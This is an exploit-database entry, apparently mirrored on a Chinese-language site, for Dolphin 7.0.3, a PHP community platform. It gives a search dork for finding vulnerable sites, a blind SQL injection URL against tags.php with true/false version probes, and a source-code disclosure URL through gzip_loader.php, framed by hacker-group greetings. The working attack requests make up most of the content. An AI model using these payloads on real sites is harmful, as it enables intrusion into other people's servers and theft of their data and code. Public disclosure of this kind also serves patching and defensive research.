Dolphin 7.0.3 – Multiple Vulnerabilities

• Exploit Database
• 12 阅读

• 作者： anT!-Tr0J4n
  日期： 2010-11-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15400/

• # Exploit Title: Dolphin Mullti Vulnerability
  
  # Date : 29-10-2010
  
  # Author : anT!-Tr0J4n
  
  # Version: 7.0.3
  
  #DorK : Powered by Dolphin
   
  #Greetz :Dev-PoinT.com ~ inj3ct0r.com~ All Dev-poinT members and my friends
  
  # Home:www.Dev-PoinT.com : http://inj3ct0r.com
  
  #Email :D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
  
  # Software Link : http://sourceforge.net/projects/boonex-dolphin
  
  
  
  ======================================================
  [>] Dolphin Blind SQL Injection Vulnerability
  ======================================================
  
  http://server/Dolphin/tags.php?action=[BSQLi]
  
  http://localhost/Dolphin/tags.php?action=1+and substring(@@version,1,1)=5 --> True
  
  http://localhost/Dolphin/tags.php?action=1+and substring(@@version,1,1)=4 --> False
  
  
  ========================================================
  Dolphin source code disclosure Vulnerability 
  ========================================================
  
  [>] exploit ->
  
  http://localhost/Dolphin/gzip_loader.php?file=(file name)
  
  
  =-=-=-=--=-=-=-=-=--=-=-=-=-
  
  #Greetz: Dev-PoinT.com ~ inj3ct0r.com ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil ; Cyber-Err0r ; Mr.Mh$TEr ; M [Zero] ; R3d-D3v1l
  
  #special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
  
  # I'm anT!-Tr0J4n member from Inj3ct0r Team
  #[+] Site: Inj3ct0r.com
  #[+] Support e-mail: submit[at]inj3ct0r.com